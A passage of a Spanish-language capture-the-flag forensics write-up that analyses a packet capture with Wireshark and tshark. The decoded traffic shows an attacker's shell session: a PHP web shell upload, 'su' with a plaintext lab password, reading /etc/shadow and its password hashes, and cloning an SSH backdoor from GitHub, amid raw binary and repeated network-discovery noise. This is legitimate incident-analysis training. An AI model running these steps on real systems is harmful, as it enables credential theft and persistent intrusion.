[Time since previous frame in this TCP stream: 0.000000000 seconds]
Frame 2: 74 bytes on wire (592 bits), 74 bytes captured (592 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162351706 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162351706 seconds
[Time delta from previous captured frame: 0.000122542 seconds]
[Time delta from previous displayed frame: 0.000122542 seconds]
[Time since reference or first frame: 0.000122542 seconds]
Frame Number: 2
Frame Length: 74 bytes (592 bits)
Capture Length: 74 bytes (592 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_6e:18:17 (00:0c:29:6e:18:17), Dst: VMware_17:ba:48 (00:0c:29:17:ba:48)
Destination: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 192.168.170.159, Dst: 192.168.170.145
0100 .... = Version: 4
.... 0101 = Header Length: 20 bytes (5)
Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
0000 00.. = Differentiated Services Codepoint: Default (0)
.... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
Total Length: 60
Identification: 0x0000 (0)
010. .... = Flags: 0x2, Don't fragment
0... .... = Reserved bit: Not set
.1.. .... = Don't fragment: Set
..0. .... = More fragments: Not set
...0 0000 0000 0000 = Fragment Offset: 0
Time to Live: 64
Protocol: TCP (6)
Header Checksum: 0x643a [validation disabled]
[Header checksum status: Unverified]
Source Address: 192.168.170.159
Destination Address: 192.168.170.145
Transmission Control Protocol, Src Port: 80, Dst Port: 47732, Seq: 0, Ack: 1, Len: 0
Source Port: 80
Destination Port: 47732
[Stream index: 0]
[Conversation completeness: Incomplete, SYN_SENT (1)]
[TCP Segment Len: 0]
Sequence Number: 0 (relative sequence number)
Sequence Number (raw): 3813293411
[Next Sequence Number: 1 (relative sequence number)]
Acknowledgment Number: 1 (relative ack number)
Acknowledgment number (raw): 2491250219
1010 .... = Header Length: 40 bytes (10)
Flags: 0x012 (SYN, ACK)
000. .... .... = Reserved: Not set
...0 .... .... = Accurate ECN: Not set
.... 0... .... = Congestion Window Reduced: Not set
.... .0.. .... = ECN-Echo: Not set
.... ..0. .... = Urgent: Not set
.... ...1 .... = Acknowledgment: Set
.... .... 0... = Push: Not set
.... .... .0.. = Reset: Not set
.... .... ..1. = Syn: Set
[Expert Info (Chat/Sequence): Connection establish acknowledge (SYN+ACK): server port 80]
[Connection establish acknowledge (SYN+ACK): server port 80]
[Severity level: Chat]
[Group: Sequence]
.... .... ...0 = Fin: Not set
[TCP Flags: ·······A··S·]
Window: 65160
[Calculated window size: 65160]
Checksum: 0x004c [unverified]
[Checksum Status: Unverified]
Urgent Pointer: 0
Options: (20 bytes), Maximum segment size, SACK permitted, Timestamps, No-Operation (NOP), Window scale
TCP Option - Maximum segment size: 1460 bytes
Kind: Maximum Segment Size (2)
Length: 4
MSS Value: 1460
TCP Option - SACK permitted
Kind: SACK Permitted (4)
Length: 2
TCP Option - Timestamps
Kind: Time Stamp Option (8)
Length: 10
Timestamp value: 894438874: TSval 894438874, TSecr 3256059711
Timestamp echo reply: 3256059711
TCP Option - No-Operation (NOP)
Kind: No-Operation (1)
TCP Option - Window scale: 7 (multiply by 128)
Kind: Window Scale (3)
Length: 3
Shift count: 7
[Multiplier: 128]
[Timestamps]
[Time since first frame in this TCP stream: 0.000122542 seconds]
[Time since previous frame in this TCP stream: 0.000122542 seconds]
[SEQ/ACK analysis]
[This is an ACK to the segment in frame: 1]
[The RTT to ACK the segment was: 0.000122542 seconds]
Frame 3: 66 bytes on wire (528 bits), 66 bytes captured (528 bits) on interface ens33, id 0
Section number: 1
Interface id: 0 (ens33)
Interface name: ens33
Encapsulation type: Ethernet (1)
Arrival Time: Jul 21, 2020 17:33:53.162441018 -03
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1595363633.162441018 seconds
[Time delta from previous captured frame: 0.000089312 seconds]
[Time delta from previous displayed frame: 0.000089312 seconds]
[Time since reference or first frame: 0.000211854 seconds]
Frame Number: 3
Frame Length: 66 bytes (528 bits)
Capture Length: 66 bytes (528 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp]
Ethernet II, Src: VMware_17:ba:48 (00:0c:29:17:ba:48), Dst: VMware_6e:18:17 (00:0c:29:6e:18:17)
Destination: VMware_6e:18:17 (00:0c:29:6e:18:17)
Address: VMware_6e:18:17 (00:0c:29:6e:18:17)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: VMware_17:ba:48 (00:0c:29:17:ba:48)
Address: VMware_17:ba:48 (00:0c:29:17:ba:48)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
CONTINUA.......................
VEMOS LAS ESTADISTICAS DE CONECCION A LNUESTRA IP HOST, aparte de las conecciones del la ip atacante , tenemos otra sospechosa: 140.82.118.4 :
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z ip_hosts,tree
=================================================================================================================================
IPv4 Statistics/All Addresses:
Topic / Item Count Average Min Val Max Val Rate (ms) Percent Burst Rate Burst Start
---------------------------------------------------------------------------------------------------------------------------------
All Addresses 3865 0,0134 100% 0,9300 139,353
192.168.170.159 3840 0,0133 99,35% 0,9300 139,353
140.82.118.4 3228 0,0112 83,52% 0,9300 139,353
192.168.170.145 608 0,0021 15,73% 0,4600 229,070
192.168.170.1 21 0,0001 0,54% 0,0600 173,637
239.255.255.250 14 0,0000 0,36% 0,0100 137,256
224.0.0.251 4 0,0000 0,10% 0,0400 173,649
192.168.170.2 4 0,0000 0,10% 0,0400 130,813
192.168.170.138 4 0,0000 0,10% 0,0200 40,711
224.0.0.22 3 0,0000 0,08% 0,0200 173,637
91.189.91.157 2 0,0000 0,05% 0,0200 92,969
192.168.170.254 2 0,0000 0,05% 0,0200 40,711
--------------------------------------------------------------------------------------------------------------------------------
VEMOS SOLO EL ENCABEZADO DE ESTA FORMA CON -q y PIPELINE HEAD EN ESTE CASO DE LOS ENDPOINT:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -z endpoints,eth0 -q | head
Running as user "root" and group "root". This could be dangerous.
================================================================================
Ethernet Endpoints
Filter:<No Filter>
| Packets | | Bytes | | Tx Packets | | Tx Bytes | | Rx Packets | | Rx Bytes |
VMware_6e:18:17 3843 3753721 1729 185301 2114 3568420
VMware_f9:85:10 3240 3564469 1771 3475258 1469 89211
VMware_17:ba:48 610 189696 347 93432 263 96264
VMware_c0:00:08 42 21154 42 21154 0 0
IPv6mcast_0c 14 10052 0 0 14 10052
IPv4mcast_7f:ff:fa 14 9772 0 0 14 9772
FILTRAMOS PARA OPTENER MAS INFORMACION ESPECIFICA DE LOS ASCCI DE CADA PAQUUETE, Y VEMOS ETC/SHADOW de JAMES, Y VEMOS MUCHOS COMANDOS EN LIMPIO Y TAMBIEN VEMOS EL PASSWORD EN TEXTO PLANO DE (su james Password: whenevernoteartinstant) MUCHO MAS:
┌──(root㉿kalipaimon)-[/home/paimon/Descargas]
└─# tshark -r overpass2.pcapng -T fields -e data | xxd -r -p
Running as user "root" and group "root". This could be dangerous.
Upload File/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@overpass-production:/var/www/html/development/uploads$ ls -lAh
ls -lAh
total 8.0K
-rw-r--r-- 1 www-data www-data 51 Jul 21 17:48 .overpass
-rw-r--r-- 1 www-data www-data 99 Jul 21 20:34 payload.php
www-data@overpass-production:/var/www/html/development/uploads$ cat .overpass
cat .overpass
,LQ?2>6QiQ$JDE6>Q[QA2DDQiQH96?6G6C?@E62CE:?DE2?EQN.www-data@overpass-production:/var/www/html/development/uploads$ su james
su james
Password: whenevernoteartinstant
james@overpass-production:/var/www/html/development/uploads$ cd ~
cd ~
james@overpass-production:~$ sudo -l]
sudo -l]
sudo: invalid option -- ']'
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
[command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p
prompt] [-T timeout] [-u user] file ...
james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant
Matching Defaults entries for james on overpass-production:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on overpass-production:
(ALL : ALL) ALL
james@overpass-production:~$ sudo cat /etc/shadow
sudo cat /etc/shadow
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::
james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor
<git clone https://github.com/NinjaJc01/ssh-backdoor
Cloning into 'ssh-backdoor'...
remote: Enumerating objects: 18, done.
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>#Ro>��JN���]�-��N+7,����%y'�=A�AF��f��0����s��
PJl���<}��jV�����_��o�v�5xi������b�I�KG
B@����@�G����OWg��;�yWŠ'�PQ�'��?���ʦ�x)s���'�,:
P8?�c�PF_q�M9��\�=���Ng���;�u.g�?L�� :��%Z.f)�G��}ց�`���"�J�"{� ϶��Y���E� ��$i��j���rmO{�J�
���i������QD6��Uk�/�Ǡ!�m��ʤ_�'��. ���0�"d�귀�J�C���
������U�Iq�oǙ
ڬ��}��$#�4�k �r�����^���#;�P������(ٲPU▒���^X�_��Y�A�7�1��3�Ĺ ��?뺸���
hZ����xʼn�*CVG�(>�R��jE۱���/▒�T��D����O�m������ɰ�ܧQ�3��o�
PP!""�e�Ӹ�8"�-#��d.2)�
���mx
���j-�d���}73��IX�&m��|?]��~�d��▒[�mQ��~�e�}��%>�vЦ:V��
mNvW���;�����]�@4˞�|���m�
)Jo!S�h'��P��,u�V�� �BW_����h��j4�����Be���z���o��PQ��$�zKr���N��b��d�L/ڌ%�'#�������uh��Xz冦�p��I�i�צ�;��R����p�P�P4`����g"�
�#�b�b��J
�N�����#{昆�/9Ѓ���Ō��\�l?M�
�o.��D\▒1{�h��f� �$�ŵ
�d��O▒"e������;�(0-g�sD�˴�=`X��������L0����s�ж��&�e��q�^*�Y���r���&��1HW�������!�h�#���, ��m�c�x��x��C
al�;+�N.4t��V���l2D�@t����q(�'���
��w�A ��c�嚢:�3�m�蕅q)�8lǕ�
M�QKz������+�(^X�=�1���{�\�-���u�|�������%���NP
�]������M�Q��5i���,�\�!@��2��=�T��k���e�-b����8:�N��vM���$��.W�����ůǫՏR��S4ފ]���a���$�C���p��my�!�&[�*;���$�
�mo����Io��r9��}K���8&z���#�k6s�������[R��l�AOftyʔ�t8�Q�ʃw�|>�i��}n▒���f`�l�=�����/▒VI~d�Ԉ +qE�A6}�.�Xtri�R6ğZ���D�hO��蓁�:����o�ߛC������N�H�ha
^z�R���?��۹�Eremote: Total 18 (delta 4), reused 7 (delta 1), pack-reused 0
Unpacking objects: 100% (18/18), done.
james@overpass-production:~$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:c2aa2a21-3460-4479-9f01-60f80a734218</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope>cd ssh-backdoor
cd ssh-backdoor
james@overpass-production:~/ssh-backdoor$ <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsd="http://schemas.xmlsoap.org/ws/2005/04/discovery"><soap:Header><wsa:To>urn:schemas-xmlsoap-org:ws:2005:04:discovery</wsa:To><wsa:Action>http://schemas.xmlsoap.org/ws/2005/04/discovery/Resolve</wsa:Action><wsa:MessageID>urn:uuid:80138158-054f-4d1d-902d-c52c31261c46</wsa:MessageID></soap:Header><soap:Body><wsd:Resolve><wsa:EndpointReference><wsa:Address>urn:uuid:00000000-0000-1000-8000-d8492faa17b6</wsa:Address></wsa:EndpointReference></wsd:Resolve></soap:Body></soap:Envelope><?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 